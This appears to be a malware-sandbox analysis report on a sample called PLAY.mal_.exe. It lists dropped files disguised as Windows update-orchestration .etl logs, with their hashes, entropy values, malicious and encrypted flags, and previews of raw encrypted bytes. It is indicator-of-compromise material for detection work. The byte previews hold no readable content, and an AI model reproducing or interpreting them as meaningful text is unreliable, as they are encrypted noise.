        SHA-256:E6B104687943C133F7B69DA46C2936A760164CD0CD4352BD523144A98E12313E
        SHA-512:BAB62ACFB746A75403C159370B07EA377F0E59E336D0ABBFD17AD4F3EAAC02A4D1B0CAB770EE8FA51ED95A413F9F7F79F5E56722332395FBA8F1E73376B6FB63
        Malicious:true
        Preview:.P:.).Rj).......i.0.ek.dkW.....%....$.k..Zs..Jo.[8z.K0.Dt.e....BR.V.......X. .S.I.<.6....t...G...7%#.e...8..[0......;h.....In..X....C..mFf.|...#.*...*PB.kl8.kl^.x. .../.\....^~X....g..uG......Mp....`.....'bxhsBx..."..x.....r...c.WC..?....^.J._....?.R....=g.`73....k.L._4.....w(CSyf~..[...2f...............>....bR.i........d..Q..g.u..z...v.TC.D..I+....wD..J.N.w.tEm...%..c.i..EF...>.K..7.\..:<(.G.{~..|..e..kM...^_o...}@6.v.q!..%.........#BKd..@b..B,....I.$....].n....8S..^...h2.XZO~5s..+.I..T.w..G....u..Jy;=....=*.;..s...0....=rgE...o.F.C..bJ*@..H..m..q......*.-\+..".....|....]....k........i.6j....w...&.P.J...3.IO..........iH...8...(.X.uyTv.U.Y..M..... ..E..vD........'.t7n........b...'M.<..TM.4...M.'...~.P...M.]....7v.6m(...n;.O.#.k.>Dpe.8....-..8.-.{.8..e<cQ.I]..E.:......'..Z.g..fWq.-U.....FN..9.../.p.n.L.../k.."..!c[.......z.._D.0vm.....l.>..o.&..ur>8.SY...I....[...-.....x......I.9{.C..5.F......'....5$b.?..6..k...Y..cU.....D..*a.QJ^l....

        C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.002.etl

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):29752
        Entropy (8bit):7.994365177765801
        Encrypted:true
        SSDEEP:
        MD5:EED8F29575A0047243E4F3F4C73C3CC0
        SHA1:55CB66C472CBB0B095773906923CBEF9F65D9575
        SHA-256:2AFC7C3419E457D2819D32BFA1006C43117076631F46CE07EA48B664BE694CA6
        SHA-512:C6B0AA8F76C68C7BBBE92BF7D77E56558683C91EDCD7F2BB62CA7BD70C5BA46A7D8CC67FEBA22A05D788410F30BBCA95E9D441199D3D2FDE537E2205E34232F4
        Malicious:true
        Preview:....n...H\.r...c.......=..O..oG.v...|....g.%|8.Z....(..^.|...x...\..1 ..\]^.I.....He.(..#....L.'9.M.........n4RC.^.%E..5V\L.{.FN.g.>.q9.t....pfx.>'.....J._.e.9.....@..Y.2..jo.."l...p.......$.._......."...N._r:.K.m_..z.5..)h..g.^..+...K.\......a....L.~k;e.2i..R.0.^..w.....~"fM1..W...h...N..6..".s.{.o.\..$..G4.;LF........Y...K/.9.S....i\$.!v..F.bap%5.^...k../.2.Fb(.p..U|5y.Y6.....6.*.......3..=.8[}tc.P%.4.GM.F[..r.Y.9...3.Qo.K.h.:.....Ku.'.....k<.Z..o{...$.R5. `X.,1.P[.+..Y.%.\.l...0..\.V.F7....z....Og..gfl[.E.....dn.e/f|.V...4..d..xN.>-...e q..SQ.......l.}p..}...........Z.`L...a;....j...m..9...v"..-.Gj}.! ..d..Es.T.X..e.{....zv.r|\9....RN..:9..#8.........z....O............C.].gl."...T..:L.....byz...\+..\..b)1>..B..Pb..-.^.br".j.......#O.....i.<./#....2!.9..ck..>..(...}5$3a..5....qm...O...D.m.l~.k...."....K.....~.}...Z......{... [.}.7\......-0it..V..\m>gL..[.............*t.......8.{:....#.$.n$J.G...p..z.0..n.5.........pfDi.........8..tC".....7..I!..

        C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.003.etl

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):5176
        Entropy (8bit):7.9610312245553585
        Encrypted:false
        SSDEEP:
        MD5:4389EC813692362AE41741C867D4DFCF
        SHA1:0178BB251F806C03BD4106BE393CC60B57A5E2F3
        SHA-256:70C6604C4DC2A774ACBE7BC0A9F31F85810088796A4C10186B06E78F9C1F9459
        SHA-512:520DAFED32171BD8B9A6973E3537BE115E3430F9E428E4FEBCF15C9960018C52E86251FD9F9433007F73C3E4A8BEB6C4EA73C1B8E99F4ADB238ED1BE5727B32A
        Malicious:false
        Preview:..0>_{.....QI..`J.....B.M.y|.JJ/.G..f...G!R.K]...x.*jq.....7.ansp.b*Fe.$^>.`.]M%....)..)..C&....%...q..sp..5..s..I....&.8..o....@.jY.e.X.qo ._.)...!*{.M...I......1....A......9...2..?=...O..\..J..n.+..D.#.....`@...R*....cc">.6.!Cp......#V..r.z. .'..Cdqr\.qox.5kVk.~N..W-{.A.. ~..._..+...u.P..a.cF.;k..OZ..`...8.3PW..'..sv.a.Y,.'.A.Sv... ]!....o..$....6..z.1l.{*..H .0\.e/.`....(.6..J..B.+2iZ.X.O...WV.../..............e|"U...I.[..I.W&B$T....T=@.q...n|..?..KI..R\{../.*.@my}.d.;(./..`.PEc.....W.~..WP..d..,.J..!.v.ma...l...n.>...U.Nv4..hj<.&.y.-..^,.....@*.0.(_m......;...g....s....cS.....f.....HDY.C....'..L..V=..oS.[b......8..z<.B..Qw....Q.N..F..)./d..n...+...W.(..,...K..!...2u6A.......h...Mw.h..A.+.`L....j...`0!..@3....4'..AH...m7(.x...X.4..+;Sf..A..Q..sw...|....v.1.r..{........@..:hS..sk.{..I.z..9..T..K..h./(...q.....$ .L...uL.....1....J?h..R."....#..m.$.`.../.Q.....iO..:,.Sz....7....{.f.h....4.Y...~.."....e..1|.r...YI..4..bZ.i.e.K....R.A^...!...y..;

        C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.004.etl

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):21560
        Entropy (8bit):7.992318893173812
        Encrypted:true
        SSDEEP:
        MD5:3A1C75D2ACE5BDDE11B70FE319DE6C3C
        SHA1:17D7BD87F13F8DE51AAE9A90F4390AEFBBC788CA
        SHA-256:CD923BA463DB592A8AA8BF8DAED499330BC6EC98C9AE0F3A59FCA78C296CE058
        SHA-512:11981AE0A80F9CF286B67413AD8446DDB944BFBA2D8EC395CD181BC773C3FB9415B79C2F0E773CAB2A1AA2D173681A1D0660BC5DB6BA88BC136AA324485193DF
        Malicious:true
        Preview:w..].~.Nwe...?....r^...m$.d;.k..c..(.[oS......dQ..h..`9s.\....=h..C...@I-#e..~.......?=1..X.S.....)K.x.er....J.f..~.VB..Q...`....r.......m...x.....c..B....9.....z..6.].X.!9...1....:..["I}...P...'......W..Y.g3/..S...|...-Y.....Gx...B.G.`j}.C ..Z.......qK.\....g.....ji%...~8HG.G...8...,. ..A..M...x1..@?.knp....-|...=(.E.........3..w.M......e...D.^..4..cC.....-..t4v.?.e.......^Bz..am.4.i.F.R~Qhv.....Q.........#{Ku..>ut..B)....Q]y...*.j.|......i'V.......|....sD..sWJR....ux.9A..s}!...;.^M.X.eeVc.....k<.c..[...E..@....A..<../..<..&'j(.....=.8y..k).\..\d..;34_[?./..{Q...&...M<.P].){.....&Lr.z..c.r.)...dC@...:....... /.".e.E...TO..o.....r....h...o7.'<U../....U....G..2.vX.*.8...;h...b........B.....Ez....g}_q.J..;.b..\.k3.!._./.t....q...S;..1.7.4 .....*...$.a.e.H...[U.Z.*:d4..7.(.5.B.u....V.$..|uuR..<|..n.......<.M.=.t....j....&.E.JX..!o..<....s..[../k..<.u@.|...]C..a...../....yM.&..`{...B.....R.<.........6.#2..x...._.^.a...z.q.Q.$z.k..#.F.:..

        C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.005.etl

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):21560
        Entropy (8bit):7.991158700155983
        Encrypted:true
        SSDEEP:
        MD5:CC8CE47F39D0B085A17380BC120534DD
        SHA1:4D2FE10B930E2CD4BE119A29C9890D22D35AFD34
        SHA-256:B23FE4723CC3902B4218C323AE590643767099F30E677D4B3BB304FED2437BE8
        SHA-512:C4178097A57E46D436A8EBB32EB259A363BBF985A97DB2F94715917F2C78FEED5014EFA1A5861F4FD008B40AD7BEF9DFE0C951B6B88C206B4109AA373DA702B4
        Malicious:true
        Preview:5.....d\...\.|.c...Q=.,.9.n..9b........^M..j.>.......8..Ql..[0..C,S....%&.T6.v...;...?.`O.U.g...i.#.z5...g..w...t..i.....#..6..h..)..Lp...>./...u....,-..J..+a..Ee.....@..S..a.V.Ivf.t.W..FN.3...T4..`........5z..Z.z.!.:...a.fiL<R.....4.-A.O...C.yw....l.'x>..`..bq.._....h.........>*..Aq.*.d.~..4.C^..p1GY..X..v.9....W.E_..^.h...VII..b.r......bb8|..#*PW`...D....{.=).Q...#...'+T[...)......a.c.L..`P..V.U.K...0A.u4...J...'>HL"p...+.W.'{.X%...n~..;4.<L...L..n.b...Z./}p.c....<.o!.O2.._uhr^.........!.^20K....H.IAP..:.b......5...r,Z.7..H....vD._7.U..qx.......qL(...3.....z.A@..J..&.b...y.l.T....a.'....M....D........T#.X4;....Y......,W...e.s.V^.8..=,...7.....B...R.e.@...&hz..k.?2.....=`j.E....e.Q.#J........H.....]i ./.Q...y....W...G<@7......Z=b.,?..|FI.T...-.Oy@H.TP).....P..9.O..........&z...Kh..p$.3.td.aD.Eg..+..`l..=.!......?A[.d]pB.w...[.W.._I.q{.GJ......k..%....b.......'A.45=.l..t!;[Zu...D....o..%<...q.2.1.G].k..%.."G....uR...Z....C.*..dly....z

        C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.006.etl

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):9272
        Entropy (8bit):7.9804445165456315
        Encrypted:false
        SSDEEP:
        MD5:7FF4FBC1AA65635868D53D1753A7E891
        SHA1:78A953185602A7A2A5E3F8F25104A9826E88F3B1
        SHA-256:3B607D13A48D3603D6B09E64903F5347920811EA6C525490123A428E0AAF20CE
        SHA-512:1D4B50B325DB37FBFD40374448BBE16CE93038BE741F9A748A3104ECCA1FC9D39A4EE7AB6138CC2ACA2B07A59E88C6EEAD92ABFF409996AB72EAE70396E757BD
        Malicious:false
        Preview:p.$.@-..2...B..~<..;.Pk..sK=r.........4.)}..b/...cZ\.o...0.87. o..].k....O.&J....Ew.....9[.gY.]..Qw5....a...<?._.g..@<.]...S.<...H#F..T..(<P.T..WQ..0.`..z....f.....(.~g..0....J.,#.......&..2.z..[+.....Z...h.....@...By..iu`6./.p..97D........B.sb.4h...F.C..H....hD.......K....BS...`47.....#2....b..{.&.....G...>*:.h.Ep:.."B.t.8....$6<.<=]....F,..ne..e+.$.bc..K.\..}_{.9..I.zA._.=.f [.~.@b{.O.m0+.x.i.(.{1.^_...,..-.n.f".r.@...A.^..\bR......V1.j.#C...H..,..'w.X%..O........Q..o]"^........$..\.-.H....l.Q.....~...5.r1.}...k.2F.....w..YJ..fy..o\ze..........Z.....x))-.....U....|...%..dc....od....-...`...y...8%..<?..m[..Y.[tV....*,.9...#_^.......=..{......u...zI.\ .WxKT...........'..V3.]C/.%...B.p.T].J.....z..UO...r.!.3.....+..5...C....k.GR..:..7oV.rB.jg.q?....*:..o...VR#..E.9.r....(t.2.a....U....Qi...y....Dn.."n3.5`..8....A.)."t%1b.i...{.+{|'...(....../...C....h1...zav.~y>a.).......a.Uh..".......^.U.'S......."XaC."..c......WEvs..H...y.v$r..Y.w...i....v5

        C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.007.etl

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):5176
        Entropy (8bit):7.960910436974693
        Encrypted:false
        SSDEEP:
        MD5:9E3CA34E7ADCEDF5EC9FD3E90D920848
        SHA1:F7950BC296CBAFBB784D7996FFA790B1B5E80667
        SHA-256:85109D158A6A714E4830ED71BE13EC449338D1928D56997AA799D3F3874E0156
        SHA-512:1FEBF9328DD6A361DB8B8039315C56B56469D59A67ACC8877B93B3A74B52A127E003A9981FEEA9736B0CCD38FE4ABB20B939E9E494B720AF56EAE1CA1E8CC8E5
        Malicious:false
        Preview:|y0..+...qeQ.u.3..E..]....z.@.s...Wp:.n.g.e....1.m......46}\+....-.O).....f.\.....F.[M...`...B.V-..|..6.(.'O|..y..T.Q.Y.....}.T...._Lu...B.|M..0..2.B.F2xa^o...U.q.0v...1.?..s3..?...m,k...Uk..B...s..n.1.R.....+.HWCmW/..0.......(.v{...G.?.6..+g..*Y....p...F...s......H.,X......"n.y0...jk...v^0.*qeQrQ.`.M...c3.t.c...DNq^.}..+....:.K....}.G...*.?.zSv.(<.c.9..p;.vY......5..}......8.[....&.;t.^y...5...ekDH....E.A..rVjw."7~..........".....u........y...nVF.{..WL...oU.EC..~..{....J..6.0..P.y..i....E....K.....&..:.[..O.....P..X......H4b.p.w.Z.Pu.C6......r..S ..S.y......q...j..h4.....@.......\t......6......S4...h... ?....2.J_^.}.|7.Zv......^..=..z.G........?..a....l..b0..-!._n`..T..w..`/..Q2..E..6..Ef{_y.]..R.L!.`^.0.$..R..1=tC.*."*&.dj{.. ........'PJv..i}.0....~. .......m.*At..`..<FAN..vIq..IO.GM..K..b{.L0...........5..E[R...ey..3..=D^y.w..B..~N{.}l..N......^.ab......l.y_p_,....L0....$"?.S.a=R. ......G...?>%.<.O...S.U...tYCt.........v...p....b.

        C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.008.etl

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):5176
        Entropy (8bit):7.964058567586822
        Encrypted:false
        SSDEEP:
        MD5:B0AC9C7E1E85C483B7307A784598E85E
        SHA1:A40B6BAD4BB21F28E2AA65066BD8E0F0517F8796
        SHA-256:59D0BBFF0020F17D46D908D50EFD0D59E2C2433A06C5877BDA9E93ED1F50E319
        SHA-512:3C571A7CAA84396E527E5DF1180E93A9A69EBEEA0D1087081084E0451302AD0EBD51FDEED284D385B9CFF06EEBD702BB4233445FA80B98402476B7BC28C431C1
        Malicious:false
        Preview:.....{..S.;..,EU...b.Q.y..g..?..,...O..9Cp.x^..Z M....'d.y..........ne..y.b.M5:.m.CZ...V.r..7..=...-.W..._@scO..En.2..4y.A..-...-.:....../.D..y>.n.0&a. ....}~S....^..iN.^%.w@.S..Z.=..7...T'.......SA..1.v..ovy=.U.Xtl...>,c..&.x.z.....1...)..$.N~....J)qFs.dj/..t4...4..x.....]p....|._.AW..._.b&E.d.g..K.*.J..m.L.W.x.|.(DAk.P/..l(.1..y,..Z..-..~....Tl_]j.....6.`.;.....6;...:).*..#?.A ..or.&B6....U..Z3@C.Ku.<.......WX....22..Y..m..U.YZ/6...L..h..r~.d.D....<....y...Z..k........3..+H..].....g#.q.B.....R.".....D........LD......S_.Q..M.N..I..SpR....S.A.y4....?..?K.[.............C.;...i..8.l...y.E.16;.t..0.~i.........t/[cU...Q(..z..\.."..-!88.*....... ...p.h. H|._.'.1m.J..mu.....I.CA&.+.....B.N..^6[esH...\.w...n.j..j8..r...$8.H.(_.;......... ....`'.C9t....V..:.Z..JW.hY...C....5.mM...]...I..........?..F.].......$.1... .:.....q.....Q v.....tx...;i:..%.....Pd..{.$.u...#.Wp.r.->.....!z...h..Kh..6'........k._d..$.2......{I.a..@Rd..K.....yXv....

        C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.009.etl

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):21560
        Entropy (8bit):7.990640605048819
        Encrypted:true
        SSDEEP:
        MD5:A2DF46175790D9BA012088C900B43B28
        SHA1:B449E880CBFA2E185770E20BE06B7519D5EBBF97
        SHA-256:0ADD976C766A5A13D38ABD8DA9B4387D03D6A2BECCC9F081FA14B9AD90BDC323
        SHA-512:CCBB794F84AB06D8F243ED7D9D0D132A6C3ECB152653FFCF7BA792544AEB6759BCD690ABA386E2788F21994B7488BC5692B28E8AD334AE014E4406FC04E5CC39
        Malicious:true
        Preview:..8d.....J.....<..oY....#..{.e.(.....}.3..|.,..yR..Y.;...}1..{...cce.%M[k....w.5..;H..Z.4.....j.W.T...dA.Q.J._..w..]...W..1#..{.W.".}....W.3V...'.u.]......mE..8vC....q...t..^...^...B.H-..........k.~..i..z....q,.c..0*L.=7i.b....^..a..i..$y.>..b...ss.,...b............mn...>....b.Y..h..+.,.lK...n.k.^.....G.}...4..*.....W..m.er......u..R0|Y..3..H.>..lz'.....8....w.......a.esD...n...K.a...K........`.B...HQ{.t.x.C.@.....d......B...m..R.\..K.WR.......K.s;N...^....R..X...T@......_.:OO..x...S..n...O..mf....b..LW..]+4..;Q.-.dL..d.+W...]..+.M....am\..i..........l.#4u.v.J..ZC..%V#...W.h"b7L..w....>."k.......7kR...r.".iUVM....S{...E..41...vE.`..7....Y..W& ....c?.J..r.g.B.U.c..L%{.g.I2....:_....... ....0...u.{r......:.V....c.Mw...u....{.Cv.>1.6..:...-.v...2.4..z....V{.!.%V....{......z;.../.....j.J..a....F...X1..Ys.|i.....!..6..Sw.Y..0...7d..}....(.8..1.....#........1 b....Z.....r$C.W2.X......{.........nM........]#..K%.9.T.L.K/G.".(')5......r..r

        C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.010.etl

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):5176
        Entropy (8bit):7.955063360238922
        Encrypted:false
        SSDEEP:
        MD5:F9ABED1A9753622EE996BB87816F8210
        SHA1:898E30F694F3A0473A936D17F2C9DD07D18D04DB
        SHA-256:292C0BB8DB038EEF24AD7F8C4B4596A4C4BE977A689CFB7E08EBBB33A1BF43AF
        SHA-512:37FE930EDB70E82B6DA75EDD03C9AC9E95DAC833FB046C7DB49D60A1E010B35427232C93B752CE6AA8F7110D6D8AF7A9DBE262543A8743E1B3EDA9E4FED8C832
        Malicious:false
        Preview:.).V.E)..............q./......,;..0\?...........7.V[...k.....%}F..z...|I]T........{...`.......c.4.@.p<..o.....>}...`,.$.V..%N.D'.B6_c+...D...25r..._..n|..`.g...-...N..\...d...._..j.H}.z.._..S..2..^......4L..:F.[.z......xvW.e.......l.Q..Ih.nrY.t...l`8B...]...V:.op...K.;7.}.k....}..nX{..R.e.L.8...aZ..(...ns#..nP'.'2q..Z..c.."........i....i.O......}cI......[.S.....l'~Z....k..k`...zE...h..^i...:O.).45..n...b..V.O.....j.8...e.w.6K.}s.;.Cv..%G.......7.....G&o6Bfr.c..'.).o5.-.a&(...wq..-.......7.QJ./.n.[..`.._..mL......2%P.[.f...}..(R.)N\.y.;...{.@.....~VT'D[.....`.4...K.......*2....g...Q.x.......p\a..N!.....k......jDgo..X.......w6...k..&...FL...B. .9B..5...mbF.i;3,=.i.,.....-...X6.f...L..W.._......... ..'|....55....S.Z5@..^=.......+:....0.I..DV..ck^.G....x.i.&.v... 2Z..".j....F.....z,....t,.0&......"Z..L..d...V......`K...Wl...7.w.1IL!]...V.6....8...G.5@rCI..,p.Y........8.......'..^.a.#...-.."....pP..:<...5K...&..M..1...[.......&?

        C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.011.etl

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):5176
        Entropy (8bit):7.965210024064226
        Encrypted:false
        SSDEEP:
        MD5:80BA803E9FA0ECFADFB842DA68994EE0
        SHA1:550344BD98C64C3AB9E65BE39A93580EAB5BDE76
        SHA-256:1E733F58417E0B75011A7DE0444EF4C39A55204E465A8DF529767F4C1D93FF83
        SHA-512:D9572C7810922B73FD410377226E6D898579F5002752A44662E8023B2611BFA66CF31FA3A54F01FC40031632A8DCD09066D6C1537F83A1F392C78BD3FF4AFFA8
        Malicious:false
        Preview:...F6..w.q..@.eE?95. .q1p.Tzj.].+....~..k...........|..\..;..^..><(.q[....':9......"...R,.\..^..E.p.(..s[....9y..bj...<;.Yb...9..[j...#C....;v..8jU...T.k...N.."..iZ..f@.W..:Wc..<....{8c..)I..|..CJ...K..&........h.r.(...m.9..$.62..nQ_.X..G..)..v..u._.'........'<.....%....h?..Z`......h._......\5....)/....;\*7...f......x....uBa...x.c..N...Rwc$..=./.....8..\..j.[.4......n.............k...S.Ag.N..,$.8.+.:..Z3.o.]EXI;...D55.k.....Bh..p@..........A.-..$..].I.s..v...Uy@.2.n9.......M...~d..]..!....I...k.C....uQ.E...Q....@.`(.r..$....f.q.E;...x...-h)'.j.....^.(h........u......+..K..%.w...#....0H=].9.;&..C.;.....5..d.~..+.....i..{xR...............%R..P.^...U.t....m........l....!.lXz.Y.|a..m...%*......)}.F.y!...V.`}Q.t..Y..H.r.Y.AL...h..jp.|}....$..5.?.)pJo..../.%...{.A4.......J..3H....6'..#.M...[.Y-..-%|...t.....Ah..>...x9...'...,...@Qa...lD.+.GK..sq.Ab.. .2.OV#t.-/@....y....i.=..E.t..<.>8.`.`...~:......X..(.W.WQ...................?.SX..l4...

        C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.012.etl

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):5176
        Entropy (8bit):7.9640414184347685
        Encrypted:false
        SSDEEP:
        MD5:2425DC8BE2FFC73B2F05D05FC88145D5
        SHA1:0E95FC81B48F4DB63A410B4EAB7ED1525371C5BD
        SHA-256:17CADCA1CB52E061B024042C00662512428377FDDECF81FDA8926AA03B5D0B7A
        SHA-512:9D149C92E677C3470FFB48D6FD7F9F0E967C20E8705CFF63C470B1FFA316822D7D8936E2642549DCB10C410E214897936FB1B9F30F9695A1A80AC43B91697BFF
        Malicious:false
        Preview:X..5..:.[uO..%....M.........i.j.....*....h.)..........v..Jxm'..~.u..17....z...7/......J...x..i....U.J.>...R.4........!.e...H..*...@...Tx..$...WHx...^U..G0...?(......v.L..t...m.$D....fK.s.#f.>?......ZR...._nb.4mSb.L.=..U...6."..4.Q..UN..qd&....Q...."..:.t....4...Cw.{.*.V....0H...H*s5E.%.pivlC....2.I.`<.....'.6.......E.......?.K.....&X0......j...K.x..|Z.X{.l... +.E+t-H..4`.$.....Z.....'........'........1.l.....].....dH.-.]....u."~.uY.'.{.....Y.~..>[.........0.N.:..Ok...A..D.1.a...&.s....*n..|..S.[x.......U(.+.}w.......|..N;.;..R...t.e?o.....[l.....H!.5..YC....v.C=.'.Ii..Q.7....n.e....X...1...y.[ .W.-.."..P..C5.n..B..}b..3....%.-..f.....#.....)..Cr.$....Yd.. .....d+.. O.9]............p..x9....g=..$Bd.M... .u..(..<.)Z...."..p5V.w.%.@......H.j......,..h.+....%......o..~"..".BH....;Y..... ".B~....Q.r..9!........[..=ghmA.Xx....}....X..77..DM..+7bx{n'...`....)u*U..US....Yx.O .....>C....z....L..v......<..l..3b.Ul!..E.?..8...../...`..:.Z.5.}F

        C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.013.etl

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):5176
        Entropy (8bit):7.9620398928975735
        Encrypted:false
        SSDEEP:
        MD5:1BFC06087045747749AD135A4819CA79
        SHA1:9826AE64CF195182FD6E9662A8A86FE6352615A5
        SHA-256:C80AE09983BED91E104EACBA274FCEA89F7E8A92A0BC3CC7476F9C5371F84301
        SHA-512:8808B8EE25DADDE49EF3F013B56DB240F3282B3985BEF433A0B1249AD880639E584ACCF6A62361A40AC5B3C9F8439989A0EE5E8649D103652AAC74EC0F72D3A1
        Malicious:false
        Preview:.h.(y.9V*;.......cp.[.....t.b.....fER.....-.3..G:b.0.7..g......m.&..XO......>}.'..E......o..>j..cL)...>...K.k..9..T.S.....K.N.E$,9F..L.5.T0.T..d.{.f.....Cx..*8.....-.r.+..t\..*......w.s.a.....-.. V5~...d..iq..A...P...r.w..,u..M..ah.\.N.....@^.,....;.=...#.nB.'..B.....:....T.J-a.......n.C......|7..A+.;..@;...S.....u...}..2F.L..;..5.....lc.D........tf. .1..$r2..`1[|8..!IZ=7H.;\...k....l..Q...RA..=%.u.....n{K.b.AO65%..........D.}G....v.4...'..#.8;....jB,...[..!#....K.../..0....R+pu.yE.LC...H..%..wj....@oy.(.?.. -..!.sR^....O......m3..I..e..2F..n.....B.......x%...h..3.lzA..q.Rv?.5.C..W.w.....>.<.-."s{2...Zb..bn...1.....?...}....x..\.|.V...}.a....(.7E.Qon..e.....i....[....!.{z...q.".X...S...nB .4.za..%g....B.x.W.t..O.^.\.%#.3...QgX3..2?..[.<....\......E.7.d...4...R...%M.r.-o....$...;~.R#D.?PT`$.(Kc..S-.l)!e.A.=*u .%M.-D&....a..+...A#&^Jg..6.a.]i.y.........Zl0w.z.G.,UO...0....Vc....6..U.."..\...?....n.ku.UM..R.!Q....Y.2....(Px...,G..?-..~...G...

        C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.014.etl

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):5176
        Entropy (8bit):7.960006635129226
        Encrypted:false
        SSDEEP:
        MD5:29BFA8201275A92D297E9770F1677145
        SHA1:9302545488AE03D1C67E2DB0F5764738CA8BE9BF
        SHA-256:E634C4F88B83DDDFBE6F6BF705F567D8A809B8D2343D012672D18F3CEB285175
        SHA-512:F2CE5859E620A18CC0246B2BD1B5A675B2D156699F2C48CE44C316FBFFBADF7820DF8D462EA8CAFB895F672F73BF7776D07288A3209D419D5E3DC3241EF98E44
        Malicious:false
        Preview:.............ck...f.2.v...Eq..0#=,z..z.....!......;.U.z.#.nu>.|.$.zj...8X......@U.T.Y...i.!..*.......ifo.....n.E..jj..44.)0o.r.H>......z./......~....H..S..Y."y7$......?h.G.5*....ZI.^...k1.&.Z..V...7..{TJ@.....B0..MN.~......v.#.{Q...F...V..{...m.ab..`.?.B< ..mJ%..<.?..#....=.z.Uj_.....g...\.P.C.d.f7..E...z5..g.......1.\...!...)'$.'..R.$.........c.Z,..{.h..I/HH.v.NJ.H.....zs...>......XXT....E$.t1q.]d0u.=K...y.../X..CmS.7..Bv^...5.]V>A...$n-}.....B..*h6....q?."/mM.#5.N.0......C.....:8.D@.}/..1..;G...Tz...MQ..Hx...'.!...U.#?...3+P..-.Y.5.....N.%..`..2:...(6.Q...)t.U..S...5........O.^.).q.@2..7-,....kdA'..h.>4^.D.?J......R9.+.^.V0...'.y.O9M%6...csG.?.MN.p[..h:Dh.G>]n...c.#?.(w.D`....n...V....|.e.t,.gw...Dt!&Jlv..Q.w...i.t...-....B....G..|jC.!o.|.U...E..._..L#.O.^........@xY].cD.[.ya_I..n;....N...+h.s..m0=..P.....>..e.#.m......<..8.q.CA..<.G......B\K...i.e...l......#.5l.q..O.F.x$..W.:..n.......|....X..g.t.).~.l.....f..{GD.6.:v.r....J..C.

        C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.015.etl

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):5176
        Entropy (8bit):7.964436974522857
        Encrypted:false
        SSDEEP:
        MD5:6389E8E76516D3D02AE9AFF7B43D1891
        SHA1:01A9ACC0727FA6155E1327B8552854AE98E32C0F
        SHA-256:1497AF30A87AF4787C343DAB261351CDE86B87EA7ECCEDF507803223FCC2D417
        SHA-512:B8A2709A73FE68B1E5DF1B4D9E7FF53C004A25D84B475C8B60D96D4718651BE5E2DF0D16C773E6EFF4727F221984D603C441B3C4A65590BB4EA5700ADBFC9D59
        Malicious:false
        Preview:lw.~..2o.O(8.L.r.E.I.KM....e&.Ia..i.O`D.).z5...=>Aav.........lvb..r.....$...dF^)|TA......wl...EV#/....g:K.1t%....9..hE^......xfU5k....._..EA.)....T..o....q."I|...qq.4...o...t........(+...H....~6...X..E...j.<...T..P........n..@...Fd'.L....q..i5....g6....=.,,w.dxi....@g...D..4.....5..hF.#..W.A+..U.1...v....W._l$.c.g...A.......h..^...b,..4....';..V(.R....@_..y.=yEod(...dRj.s^......t....P..../3.+........%.../...k....d.h.~Bo>2...4|m...*....S...?g...up%..sWz.?..w..:T..L.-R.e .....S.....V..#...6..i........B&.+..w@k...!)+..N.~.X..U..]+.FJ.v.`...C..~.\...m..O#.:"s.t.V.c...=,.A...#l.6..?....W.{..R.)..;..nW.C].).@Ze"f.\...7s..8f.=...V"CX...d..e.....E...2....!O*n.F..........L..........N.b..~).$..(|.,...7...9.....m|...Y..t...h..I.p............y.P.......^b:'K0#....q{....f...k.i.2g.&...cG....a.9l.... <.....;...[uH.L[.R`..1:.......(d}:.vk..%x......Q].(...n..AcTbT....?A..y.w.....*.g....K`..*......:....\...1m.@H[..-L.;..R.-.....<.j...L..y.?!7..Q..a>.;.x...f!....?..0.]

        C:\ProgramData\USOShared\Logs\UpdateSessionOrchestration.016.etl

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):5176
        Entropy (8bit):7.963827418953566
        Encrypted:false
        SSDEEP:
        MD5:DACE244E5FB7240D0D05AD567B31E086
        SHA1:73948DB2211C2D1976E6CB958403675C68DEDA6B
        SHA-256:3F9D56AC208C37596DB4B31EC37FFF12CB7125FF3672E30B55EE06537B64303A
        SHA-512:625CB26E55BC179AC59E8045F583C05500EC845044AB0EAE1F3A52087B8C6DA80781932166A5B405E9D2E3852E962D088EE197390AABCC20DB4896D42A1570EA
        Malicious:false
